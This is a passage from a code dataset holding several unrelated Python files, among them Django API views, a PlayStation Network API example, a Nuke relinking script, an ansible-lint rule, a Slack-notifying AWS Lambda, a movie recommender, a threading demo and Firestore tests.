rest_framework.permissions import AllowAny\nfrom rest_framework import status\nfrom api.settings import BASE_DIR\nfrom PIL import Image\nfrom rest_framework.parsers import FileUploadParser, MultiPartParser\nfrom models import Resource, UserHasResource, CompanyHasResource\nfrom user.models import Data\nfrom serializers import ResourceSerializer\nimport cloudinary.uploader\nimport cloudinary.api\nfrom django.core.files.storage import default_storage\nfrom django.core.files.base import ContentFile\nfrom user.upload_helper import Upload_Helper\nimport json\nimport boto3\nimport os\n\n\n\nclass ResourcesAPI(APIView):\n    parser_classes = (MultiPartParser,)\n\n    def post(self, request):\n\n        \"\"\"\n        Creates a new Resource\n        :param request:\n        {\n            \"name\": \"string\",\n            \"url\": \"string\",\n            \"logo\": \"string\",\n            \"category\": \"string\"\n        }\n        :return: {message: string, resource: ResourceSerializer}\n        \"\"\"\n        data = request.data\n        file = request.data.get('file')\n\n        try:\n\n            if file:\n                url = Upload_Helper.upload_s3(file=file, file_type=data.get('file_type'), thumb=False)\n            else:\n                url = data.get('url')\n\n            resource = Resource.objects.create(\n                name=data.get('name', ''),\n                category=data.get('category'),\n                file_type=data.get('file_type'),\n                description=data.get('description'),\n                url=url,\n                company_id=data.get('company_id', None)\n            )\n\n            return Response({'resource': ResourceSerializer(resource).data}, status=status.HTTP_201_CREATED)\n        except Exception as e:\n            return Response({'message': 'Error adding new resource'}, status=status.HTTP_400_BAD_REQUEST)\n\n\n
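    # Illustrative request body (added commentary; field names are taken from the code\n    # above, values are hypothetical): a multipart POST with name='Tax checklist',\n    # category='documents', file_type='pdf', description='...', and either an uploaded\n    # 'file' (stored via Upload_Helper.upload_s3) or a plain 'url' field.\n\n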
    def get(self, request):\n\n        \"\"\"\n        Get all resources visible to the requesting user\n        :return: {global_resources, company_resources, practice_resources}\n        \"\"\"\n\n        try:\n            global_resources = []\n            company_resources = []\n            practice_resources = []\n\n            if request.user.data.user_type == Data.ACCOUNTANT:\n                global_resources = ResourceSerializer(Resource.objects.filter(company=None), many=True).data\n                practice_resources = ResourceSerializer(\n                    Resource.objects.filter(company=request.user.data.company), many=True\n                ).data\n                # all_resources += all_resources + accounting_resources\n\n            if request.user.data.user_type == Data.CLIENT:\n                company_resources = ResourceSerializer(Resource.objects.filter(\n                    id__in=CompanyHasResource.objects.filter(company=request.user.data.company)\n                    .values_list('resource_id', flat=True)), many=True\n                ).data\n\n                for resource in company_resources:\n                    company_has_resource = CompanyHasResource.objects.get(\n                        company=request.user.data.company,\n                        resource_id=resource.get('id')\n                    )\n                    resource['order'] = company_has_resource.order\n                    resource['user_resource_id'] = company_has_resource.id\n\n                from operator import itemgetter\n                company_resources = sorted(company_resources, key=itemgetter('order'))\n\n
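                # Added note (commentary): itemgetter('order') sorts the serialized dicts\n                # by their 'order' key, e.g. [{'order': 2, ...}, {'order': 1, ...}] becomes\n                # [{'order': 1, ...}, {'order': 2, ...}] before the response is built.\n\n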
            return Response(\n                {\n                    'global_resources': global_resources,\n                    'company_resources': company_resources,\n                    'practice_resources': practice_resources\n                }, status=status.HTTP_200_OK)\n        except Exception as e:\n            return Response({'message': 'Error retrieving resources'}, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n\n\n\n\n\n\n","sub_path":"resources/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"554626771","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom psnapi.Auth import Auth\nfrom psnapi.Friend import Friend\nfrom psnapi.User import User\nfrom psnapi.Messaging import Messaging\nimport json\n\nwith open('tokens', encoding='utf-8') as data_file:\n    data = json.loads(data_file.read())\n\nnew_token_pair = Auth.GrabNewTokens(data['refresh'])\n\ntokens = {\n    \"oauth\": new_token_pair[0],\n    \"refresh\": new_token_pair[1],\n    \"npsso\": data['npsso']  # saved above!\n}\nprint(tokens)\n\nfriend = Friend(tokens)\nfriend_list = friend.my_friends()\n# print(friend.my_friends(nickname='onnkei'))\n\nfriend_string = ''\nif bool(friend_list):\n    for key, value in friend_list.items():\n        if value != \"\":\n            friend_string += key+' is playing '+value+\"\\n\"\n        else:\n            friend_string += key+' is online'+\"\\n\"\nelse:\n    friend_string = 'No friends online'\n\n# print(friend_string.replace('ÂŽ', ''))\n\nuser = User(tokens)\n\n# print(user.userinfo())\n# print(user.userinfo('haruhi2728'))\n# print(friend.get_info('onnkei'))\n\n# print(user.gamesinfo())  # HTTP Error 403: Forbidden\n# print(user.gamesinfo('haruhi2728'))  # HTTP Error 403: Forbidden\n\n# print(user.friendsinfo())\n# print(user.friendsinfo('hello1348qwer'))\n# print(user.friendsinfo('onnkei'))  # HTTP Error 403: Forbidden\n\n# print(user.trophyinfo('onnkei'))\n\n# print(user.trophy_all())\n","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"626162909","text":"# Utility\nimport time\nimport datetime\nfrom django.utils import simplejson\n\n# Template and context-related imports\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.core.urlresolvers import reverse\n\n# Django Aggregation\nfrom django.db.models import Sum\n\n# API Models\nfrom element43.apps.api.models import JournalEntry\nfrom apps.api.models import Character, APITimer, CharSkill, MarketTransaction\n\n# Util\nfrom apps.common.util import validate_characters, calculate_character_access_mask\nfrom apps.dashboard.util import calculate_profit_stats\n\n\n@login_required\ndef dashboard(request):\n    \"\"\"\n    Shows basic information about your account so you can quickly get an overview.\n    \"\"\"\n\n    # Sheet based data\n    chars_sheet = validate_characters(request.user, calculate_character_access_mask(['CharacterSheet']))\n    sheet_data = []\n\n    for char in chars_sheet:\n        sheet_data.append({'char': char,\n                           'next_update': APITimer.objects.get(character_id=char.id,\n                                                               apisheet='CharacterSheet').nextupdate})\n\n    # Get all WalletJournal/WalletTransactions Chars\n    market_chars = validate_characters(request.user, calculate_character_access_mask(['WalletJournal', 'WalletTransactions']))\n\n    # Collect stats\n    month = calculate_profit_stats(market_chars, 30)\n    week = calculate_profit_stats(market_chars, 7)\n    day = calculate_profit_stats(market_chars, 1)\n\n    last_ten_sales = MarketTransaction.objects.filter(character__in=market_chars, is_bid=False).extra(select={'value': \"price * quantity\"}).order_by('-date')[:10]\n\n    rcontext = RequestContext(request, {'sheet_data': sheet_data,\n                                        'month': month,\n                                        'week': week,\n                                        'day': day,\n                                        'last_ten_sales': last_ten_sales})\n\n    return render_to_response('dashboard.haml', rcontext)\n\n\n@login_required\ndef journal_json(request):\n    # Get all chars with journal permissions\n    chars = validate_characters(request.user, calculate_character_access_mask(['WalletJournal']))\n\n    wallet_series = {}\n\n    # Append wallet history of all characters to dict\n    for char in chars:\n        series = []\n        journal = JournalEntry.objects.filter(character=char).order_by('date')\n\n        for point in journal:\n            series.append([int(time.mktime(point.date.timetuple())) * 1000, point.balance])\n\n        # If there aren't any journal entries, catch the resulting AssertionError and return empty list\n        try:\n            # Add current balance in the end for a more consistent look\n            series.append([(int(time.mktime(datetime.datetime.utcnow().timetuple())) * 1000), journal[len(journal) - 1].balance])\n        except AssertionError:\n            series = []\n\n        wallet_series[char.name] = series\n\n    json = simplejson.dumps(wallet_series)\n\n    # Return JSON without using any template\n    return HttpResponse(json, mimetype='application/json')\n\n\n@login_required\ndef char_sheet(request, char_id):\n\n    try:\n        char = Character.objects.get(user=request.user, id=char_id)\n    except Character.DoesNotExist:\n        messages.error(request, 'There is no such character in our database.')\n        return HttpResponseRedirect(reverse('home'))\n\n    # Get skills\n    skills = CharSkill.objects.filter(character_id=char.id).order_by('skill__group')\n\n    skill_points = CharSkill.objects.filter(character_id=char.id).aggregate(Sum('skillpoints'))['skillpoints__sum']\n\n    rcontext = RequestContext(request, {'char': char, 'skills': skills, 'skill_points': skill_points})\n    return render_to_response('_char_sheet.haml', rcontext)\n","sub_path":"webapp/element43/apps/dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"220295600","text":"import nuke\nimport os\nimport fnmatch\nimport shutil\n\ndef fixReadError():\n\n    basePath = nuke.getFilename('Select Dir', \" \", type='open')\n\n    if basePath is not None:\n        missingRead = \"\"\n        for i in nuke.allNodes():\n            if i.Class() == 'Read':\n                if i.error():\n                    oldpath = i['file'].value()\n                    oldname = os.path.basename(oldpath)\n                    fileExt = oldname[-3:]\n                    fileName = oldname[:-4]\n\n                    # Build a wildcard pattern by replacing any printf-style frame token;\n                    # default to the plain name so findFile is always defined\n                    newfindname = fileName\n                    for token in (\"%d\", \"%02d\", \"%03d\", \"%04d\", \"%05d\", \"%06d\"):\n                        if fileName.find(token) != -1:\n                            newfindname = fileName.replace(token, \"*\")\n                    findFile = newfindname + \".\" + fileExt\n\n
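                    # Added worked example (commentary): for oldname 'shot_%04d.exr',\n                    # fileName is 'shot_%04d' and fileExt is 'exr', so findFile becomes\n                    # 'shot_*.exr', which fnmatch below matches against files such as\n                    # 'shot_0001.exr'.\n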
fileName.find(\"%04d\") != -1:\n newfindname = fileName.replace(\"%d\", \"*\") and fileName.replace(\"%04d\", \"*\")\n if fileName.find(\"%05d\") != -1:\n newfindname = fileName.replace(\"%d\", \"*\") and fileName.replace(\"%05d\", \"*\")\n if fileName.find(\"%06d\") != -1:\n newfindname = fileName.replace(\"%d\", \"*\") and fileName.replace(\"%06d\", \"*\")\n findFile = newfindname + \".\" + fileExt\n\n path = os.path.join(basePath)\n for path, dirs, files in os.walk(path):\n subpath = path\n for file in os.listdir(subpath):\n if fnmatch.fnmatch(file, findFile):\n reformatPath = subpath.replace(\"\\\\\",\"/\")\n i['file'].setValue(reformatPath +'/'+ oldname)\n\n if i.error() == False:\n missingRead = i.name() + \" - \" + oldname + \" - \" + \" Found Successfully!\" + \"\\n\" + missingRead\n else:\n missingRead = i.name() + \" - \" + oldname + \" - \" + \" Not Fpund!\" + \"\\n\" + missingRead\n else:\n if missingRead == \"\":\n missingRead = \"You don't have any readNode with error!.\"\n else:\n missingRead = \"No folder was selected!\"\n nuke.message(missingRead)\n\nfixReadError()","sub_path":"333_nuke/__exercises/Nuke_Scripting_for_Pipeline_TD/005_Prakticheskij_blok_1/fixReadsMy.py","file_name":"fixReadsMy.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"534326545","text":"#\n# (c) Copyright 2016 Hewlett Packard Enterprise Development LP\n# (c) Copyright 2017 SUSE LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n\nimport re\nimport sys\n\nfrom ansiblelint import AnsibleLintRule\n\n\nclass ArdanaModeOctalOrSymbolicRule(AnsibleLintRule):\n id = 'ARDANAANSIBLE0011'\n shortdesc = 'mode must be symbolic, variable or a 4-digit octal'\n description = ('mode when specified for file, copy and template tasks, '\n 'must be symbolic (e.g. \"u=rw,g=r,o=r\"), '\n 'a variable (e.g. \"{{ mode }}\") '\n 'or a 4-digit octal (e.g. 
0700, \"0700\")')\n tags = ['formatting']\n _commands = ['file', 'copy', 'template']\n _ignore_states = ['absent', 'link']\n\n @staticmethod\n def validate_mode(mode):\n # convert symbolic to octal\n def rwx_to_oct(string):\n retval = 0\n for match, decimal in zip('rwx', [4, 2, 1]):\n retval += decimal if match in string else 0\n return retval\n matched = re.match(\"u=([rwx]+),g=([rwx]+),o=([rwx]+)\", mode)\n if matched:\n mode = \"0\" + ''.join(str(rwx_to_oct(i)) for i in matched.groups())\n\n matched = re.match(\"0([4567])([04567])([04567])\", mode)\n if not matched:\n return True\n user, group, other = (int(i) for i in matched.groups())\n\n if user < group or group < other:\n return True\n return False\n\n def matchtask(self, file, task):\n if sys.modules['ardana_noqa'].skip_match(file):\n return False\n action = task[\"action\"]\n if action[\"module\"] in self._commands:\n if action.get(\"state\") in self._ignore_states:\n return False\n if \"mode\" not in action:\n return True\n mode = action.get(\"mode\")\n if isinstance(mode, int):\n mode = \"%04o\" % mode\n if not isinstance(mode, str):\n return True\n if mode.startswith(\"{{\"):\n return False\n return self.validate_mode(mode)\n\n\n# ansible-lint expects the filename and class name to match\n# Python style expects filenames to be all lowercase\n# Python style expects classnames to be CamelCase\n# Resolution: trick ansible lint with this class\nclass ardana_mode_octal_or_symbolic_rule(ArdanaModeOctalOrSymbolicRule):\n pass\n","sub_path":"lint_rules/ardana_mode_octal_or_symbolic_rule.py","file_name":"ardana_mode_octal_or_symbolic_rule.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"10820437","text":"class Solution(object):\n def reverse(self, x):\n if x < 0: return -self.reverse(-x);\n result = 0;\n while x > 0:\n result = result * 10 + x % 10;\n x = x / 10;\n return 0 if result > 0x7FFFFFFF else result\n\ns = Solution()\nprint(s.reverse(-10100))\n","sub_path":"7. 
Reverse Integer/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"542741422","text":"import os\nimport json\nimport http.client\n\nslack_host = os.environ.get(\"SLACK_HOST\")\nslack_webhook_endpoint = os.environ.get(\"SLACK_WEBHOOK_ENDPOINT\")\nslack_channel = os.environ.get(\"SLACK_CHANNEL\")\nheaders = {\n 'Content-Type': 'application/json',\n}\n\n\ndef call_slack_webhook(topic, title, message, sender='Notice from AWS'):\n connection = http.client.HTTPSConnection(slack_host)\n\n # TODO: make more generic/customisable\n post_data = {\n \"channel\": slack_channel,\n \"username\": sender,\n \"text\": \"*\" + topic + \"*\",\n \"icon_emoji\": \":aws_logo:\",\n \"attachments\": [{\n \"title\": title,\n \"text\": message\n }]\n }\n\n connection.request(\"POST\", slack_webhook_endpoint, json.dumps(post_data), headers)\n response = connection.getresponse()\n connection.close()\n\n return response.status\n\n\ndef lambda_handler(event, context):\n # Log the received event\n print(f\"Received event: {json.dumps(event, indent=2)}\")\n\n # set Slack message defaults in case we cannot extract more meaningful data\n # at least this should produce a Slack notification we can follow up on\n slack_sender = \"\"\n slack_topic = \"Unknown\"\n slack_title = \"Unknown\"\n slack_message = \"Unknown\"\n\n # check what kind of event we have received\n if event.get('topic'):\n # Custom event for Slack\n print(\"Custom Slack event\")\n slack_topic = event['topic']\n slack_title = event['title'] if event.get('title') else \"\"\n slack_message = event['message'] if event.get('message') else \"\"\n elif event.get('Records'):\n # SNS notification\n print(\"Received event records. 
Looking at first record only\")\n record = event['Records'][0] # assume we only have one record TODO: check for situations where we can have more\n if record.get('EventSource') or record.get('eventSource'):\n slack_sender = f\"Message from {record['EventSource']}{record['eventSource']}\"\n if record.get('Sns'):\n print(\"Extracted SNS record\")\n sns_record = record.get('Sns')\n topic_arn = sns_record['TopicArn'] if sns_record.get('TopicArn') else \"\"\n slack_topic = f\"SNS topic: {topic_arn}\"\n if sns_record.get('Message'):\n print(f\"Message: {sns_record['Message']}\")\n message = json.loads(sns_record['Message'])\n if message.get('AlarmName'):\n slack_title = f\"Alarm {message['AlarmName']} changed to {message['NewStateValue']}\"\n slack_message = message['AlarmDescription'] if message.get('AlarmDescription') else \"\"\n elif 'Stratus' in topic_arn:\n # There can be GDS and TES notifications\n # TODO: check differences between notifications\n slack_title = message['name'] if message.get('name') else \"\"\n stratus_status = message['status'] if message.get('status') else \"\"\n stratus_type = sns_record['MessageAttributes']['type']['Value']\n stratus_action = sns_record['MessageAttributes']['action']['Value']\n slack_message = F\"A {stratus_type} was {stratus_action}\"\n if stratus_status:\n slack_message += f\": Status {stratus_status}\"\n else:\n slack_message = \"Unrecognised SNS notification format\"\n else:\n print(\"SNS record does not seem to contain a message\")\n elif record.get('s3'):\n print(\"Got S3 event\")\n else:\n print(\"No 'Sns' record found\")\n elif event.get('source'):\n print(\"Regular CloudWatch event\")\n # Regular AWS event, need to extract useful information\n event_source = event['source']\n event_detail_type = event['detail-type'] if event.get('detail-type') else \"\"\n event_id = event['id'] if event.get('id') else \"\"\n event_account = event['account'] if event.get('account') else \"\"\n event_resources = event['resources'] if event.get('resources') else []\n event_resources_names = []\n for event_res in event_resources:\n event_resources_names.append(event_res.rpartition(\":\")[2])\n slack_topic = f\"AWS event from {event_source} in account {event_account}\"\n slack_title = f\"{event_detail_type} (id:{event_id}) for {event_resources_names}\"\n # event details are event specific, we just dump them into the message\n slack_message = json.dumps(event['detail'])\n else:\n slack_topic = \"Unknown event source\"\n slack_title = \"Don't know how to handle this event\"\n slack_message = json.dumps(event, indent=2)\n\n # Forward the data to Slack\n try:\n print(f\"Sending Slack message with topic ({slack_topic}), title ({slack_title}) and message ({slack_message})\")\n if slack_sender != \"\":\n response = call_slack_webhook(slack_topic, slack_title, slack_message, slack_sender)\n else:\n response = call_slack_webhook(slack_topic, slack_title, slack_message)\n print(f\"Response status: {response}\")\n return event\n\n except Exception as e:\n print(e)\n","sub_path":"terraform/stacks/bootstrap/lambdas/notify_slack.py","file_name":"notify_slack.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"5230020","text":"import pandas as pd\n\nratings = pd.read_csv('../../assets/ml-latest-small/ratings.csv', usecols=range(3), encoding='ISO-8859-1')\nmovies = pd.read_csv('../../assets/ml-latest-small/movies.csv', usecols=range(2), encoding='ISO-8859-1')\n\n# 
print(ratings.head())\n# print(movies.head())\n\nratings = pd.merge(movies, ratings)\n# print(ratings.tail(10))\n\nmovieRatings = ratings.pivot_table(index=['userId'], columns=['title'], values='rating')\n# print(movieRatings.tail(10))\n\ncurrMovieRatings = movieRatings['GoldenEye (1995)']\ncurrMovieRatings = currMovieRatings.dropna() #drop NaN values\n# print(currMovieRatings.head(10))\n\nsimilarMovies = movieRatings.corrwith(currMovieRatings) #getting correlation with other movies\nsimilarMovies = similarMovies.dropna()\n\ndf = pd.DataFrame(similarMovies)\n# print(df.head(10))\n\n#sort the results with similarity score\nsimilarMovies = similarMovies.sort_values(ascending=False)\nprint(similarMovies.head(20))\n\n#how many ratings exist for each movie\nimport numpy as np\nmovieStats = ratings.groupby('title').agg({'rating': [np.size, np.mean]})\n\n#remove movies which are only rated by very few people\npopularMovies = movieStats['rating']['size'] >= 120\n# print(popularMovies.head(10))\n\nprint(movieStats[popularMovies])\n\nsortedPopular = movieStats[popularMovies].sort_values([('rating', 'mean')], ascending=False)\n# print(sortedPopular.head(10))\n\nsimilarmoviesdf = pd.DataFrame(similarMovies, columns=['similarity'])\nprint(similarmoviesdf)\n\ndf = movieStats[popularMovies].join(similarmoviesdf)\ndf = df.sort_values(['similarity'], ascending=False)\nprint(df.head(10))\n\n","sub_path":"MachineLearning/RecommenderSystems/MoviesRecommender.py","file_name":"MoviesRecommender.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"11306480","text":"# -*- mode: python -*-\n\nblock_cipher = None\n\n\na = Analysis(['main6.py'],\n pathex=['C:\\\\\\\\Users\\\\\\\\J7LI\\\\\\\\OneDrive - Nokia\\\\\\\\python\\\\\\\\python\\\\\\\\mypy37-32\\\\\\\\SRAN_Reading\\\\\\\\SRAN_Reading_ToolV2\\\\\\\\TDD_mod', 'C:\\\\\\\\Users\\\\\\\\J7LI\\\\\\\\OneDrive - Nokia\\\\\\\\python\\\\\\\\python\\\\\\\\mypy37-32\\\\\\\\SRAN_Reading\\\\\\\\SRAN_Reading_ToolV2\\\\\\\\SRAN_mod', 'C:\\\\Users\\\\J7LI\\\\OneDrive - Nokia\\\\python\\\\python\\\\mypy37-32\\\\SRAN_Reading\\\\SRAN_Reading_ToolV2'],\n binaries=[],\n datas=[],\n hiddenimports=[],\n hookspath=[],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n [],\n name='main6',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n runtime_tmpdir=None,\n console=False , icon='icon\\\\icon.ico')\n","sub_path":"main6.spec","file_name":"main6.spec","file_ext":"spec","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"292884197","text":"# Advanced Programming in Python -- Lesson 7 Assignment 1\n# Jason Virtue\n# Start Date 2/23/2020\n\n#Original code set with multiple threads writing to stdout and with locks to prevent race condition\nimport random\nimport sys\nimport threading\nimport time\n\n#Lock condition to lock each thread till it completes\nlock = threading.Lock()\n\n#Locks to prevent race condition. STDOUT Function. 
Sleep condition causing unequal function durations\ndef write():\n lock.acquire()\n sys.stdout.write(\"%s writing..\" % threading.current_thread().name)\n time.sleep(random.random())\n sys.stdout.write(\"..done\\n\")\n lock.release()\n\n#Run function 50 times with a fixed sleep timeframe\nthreads = []\nfor i in range(50):\n thread = threading.Thread(target=write)\n thread.daemon = True # allow ctrl-c to end\n thread.start()\n threads.append(thread)\n time.sleep(.01)\n\n# Now join() them all so the program won't terminate early\n# required because these are all daemon threads\nfor thread in threads:\n thread.join()\n\n","sub_path":"students/j_virtue/lesson07/activity/stdout_writer_solution.py","file_name":"stdout_writer_solution.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"498569087","text":"# encoding = 'utf-8'\n\nclass Solution(object):\n def canPlaceFlowers(self, flowerbed, n):\n \"\"\"\n :type flowerbed: List[int]\n :type n: int\n :rtype: bool\n \"\"\"\n for i in range(len(flowerbed)):\n if flowerbed[i]==0 and (i==0 or flowerbed[i-1]==0) and (i==len(flowerbed)-1 or flowerbed[i+1]==0):\n flowerbed[i] = 1\n n -=1\n\n return n<=0\n\nflowerbed = [1,0,0,0,0,1]\nn = 2\n\ntest = Solution()\nresult = test.canPlaceFlowers(flowerbed,n)\nprint(result)\n","sub_path":"20181007-605-Can_Place_Flowers.py","file_name":"20181007-605-Can_Place_Flowers.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"480625411","text":"while True:\n PaqueteLibraA = float (input (\"Precio por libra paquete A: \"))\n PorcentajeMagroA = float (input (\"Porcentaje magro del paquete A: \"))\n PaqueteLibraB = float (input (\"Precio por libra paquete B: \"))\n PorcentajeMagroB = float (input (\"Porcentaje magro del paquete B: \"))\n CalcularA = PaqueteLibraA/PorcentajeMagroA\n CalcularB = PaqueteLibraB/PorcentajeMagroB\n print(\"Costo de carne Paquete A: \",CalcularA)\n print(\"Costo de carne Paquete B: \",CalcularB)\n if CalcularA > CalcularB:\n print(\"El paquete B es el mejor\")\n print(\"-----------------------------\")\n else:\n print(\"El paquete A es el mejor\")\n print(\"-----------------------------\")\n","sub_path":"Leccion 5/Ejercicio3.py","file_name":"Ejercicio3.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"255771476","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\n\nfrom symposion.conference.models import Conference, Section\nfrom symposion.proposals.models import ProposalBase\nfrom symposion.speakers.models import Speaker\nfrom symposion.schedule.models import Presentation\nfrom symposion.schedule.tests.factories import ProposalKindFactory\n\n\nclass UserlessSpeakersTestCase(TestCase):\n @classmethod\n def setUpTestData(cls):\n # Create two speakers - one with a User attached, and one without.\n user_model = get_user_model()\n user = user_model.objects.create(\n username=\"test\",\n email=\"example@example.com\",\n first_name=\"Test\",\n last_name=\"User\",\n )\n primary_speaker = Speaker.objects.create(user=user, name=\"Speaker #1\")\n cls.second_speaker = Speaker.objects.create(\n user=None, name=\"Speaker #2\"\n )\n\n # A Presentation needs a ProposalBase, and\n # a ProposalBase needs a ProposalKind, and\n # a ProposalKind needs a Section, and\n # A Section needs a 
Conference, and\n # the developer who wrote this test case needs a hug!\n conference = Conference.objects.create(title=\"Conference\")\n section = Section.objects.create(\n conference=conference, name=\"Section\", slug=\"section\"\n )\n proposal_kind = ProposalKindFactory.create(section=section)\n proposal_base = ProposalBase.objects.create(\n title=\"Proposal\",\n description=\"...\",\n abstract=\"...\",\n speaker=primary_speaker,\n kind=proposal_kind,\n )\n cls.presentation = Presentation.objects.create(\n title=\"Presentation\",\n description=\"...\",\n abstract=\"...\",\n speaker=primary_speaker,\n proposal_base=proposal_base,\n section=section,\n )\n cls.presentation.additional_speakers.add(cls.second_speaker)\n\n def test_userless_speaker_name(self):\n \"\"\"Test that userless speakers will display their names.\"\"\"\n self.assertEqual(str(self.second_speaker), self.second_speaker.name)\n\n def test_presentation_userless_speakers(self):\n \"\"\"Test that presentation speaker counts include all speakers.\"\"\"\n # A Presentation's speakers() method is a generator of all\n # associated speakers who have accepted their association.\n # If it is properly returning all accepted speakers,\n # the result should be one (not two).\n self.assertEqual(len(list(self.presentation.speakers())), 1)\n","sub_path":"symposion/schedule/tests/test_userless_speakers.py","file_name":"test_userless_speakers.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"415151955","text":"import sys\nimport os\nimport numpy\n\nfrom PyQt5.Qt import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\n\nfrom WorkerThread import WorkerThread\nfrom PLTWidget import PLTWidget\nfrom Utility import fitness\n\nclass GUI(QMainWindow):\n def __init__(self):\n super(GUI, self).__init__()\n uic.loadUi('ui.ui', self)\n self.start_button.clicked.connect(self.start)\n self.stop_button.clicked.connect(self.stop)\n self.worker_thread = None\n self.fitness_list = []\n self.mean_list = []\n self.std_list = []\n self.pltwidget.canvas.draw()\n self.show()\n\n def init_textedits(self):\n self.solution.setEnabled(False)\n\n def start(self):\n self.fitness_list = []\n self.mean_list = []\n self.std_list = []\n try:\n self.finished.setText(\"\")\n self.best.setText(\"Best fitness so far:\")\n self.solution.setText(\"\")\n particle_size = int(self.particle_edit.toPlainText())\n iterations = int(self.iterations_edit.toPlainText())\n swarm_size = int(self.swarm_edit.toPlainText())\n neighbourhoods = int(self.neighbourhood_edit.toPlainText())\n w = float(self.w_edit.toPlainText())\n c1 = float(self.c1_edit.toPlainText())\n c2 = float(self.c2_edit.toPlainText())\n self.thread = WorkerThread(30, iterations, swarm_size, neighbourhoods, particle_size, w, c1, c2)\n self.thread.run_finished.connect(self.update_graph)\n self.thread.start()\n except ValueError:\n pass\n \n def stop(self):\n self.thread.terminate()\n\n def update_graph(self, matrix):\n new_best = fitness(matrix.best)\n self.fitness_list.append(new_best)\n self.mean_list.append(numpy.average(self.fitness_list))\n self.std_list.append(numpy.std(self.fitness_list))\n self.pltwidget.canvas.axes.clear()\n self.pltwidget.canvas.axes.plot(self.fitness_list)\n self.pltwidget.canvas.axes.plot(self.mean_list)\n self.pltwidget.canvas.axes.plot(self.std_list)\n self.pltwidget.canvas.axes.legend(('Fitness', 'Mean', 'Standard Deviation'), 
loc='upper right')\n best = max(self.fitness_list)\n if(new_best >= best):\n self.solution.setText(str(matrix.best))\n self.best.setText(\"Best fitness so far: \" + str(new_best))\n self.pltwidget.canvas.draw()\n if len(self.fitness_list) == 30:\n self.finished.setText(\"Finished!\")","sub_path":"Artificial Intelligence/Lab4/Lab 4 - PSO - Dombi Norbert - 923-2/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"419605657","text":"# Copyright 2017 Google LLC All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\nimport mock\n\n\nclass TestBaseTransaction(unittest.TestCase):\n @staticmethod\n def _get_target_class():\n from google.cloud.firestore_v1.base_transaction import BaseTransaction\n\n return BaseTransaction\n\n def _make_one(self, *args, **kwargs):\n klass = self._get_target_class()\n return klass(*args, **kwargs)\n\n def test_constructor_defaults(self):\n from google.cloud.firestore_v1.transaction import MAX_ATTEMPTS\n\n transaction = self._make_one()\n self.assertEqual(transaction._max_attempts, MAX_ATTEMPTS)\n self.assertFalse(transaction._read_only)\n self.assertIsNone(transaction._id)\n\n def test_constructor_explicit(self):\n transaction = self._make_one(max_attempts=10, read_only=True)\n self.assertEqual(transaction._max_attempts, 10)\n self.assertTrue(transaction._read_only)\n self.assertIsNone(transaction._id)\n\n def test__options_protobuf_read_only(self):\n from google.cloud.firestore_v1.types import common\n\n transaction = self._make_one(read_only=True)\n options_pb = 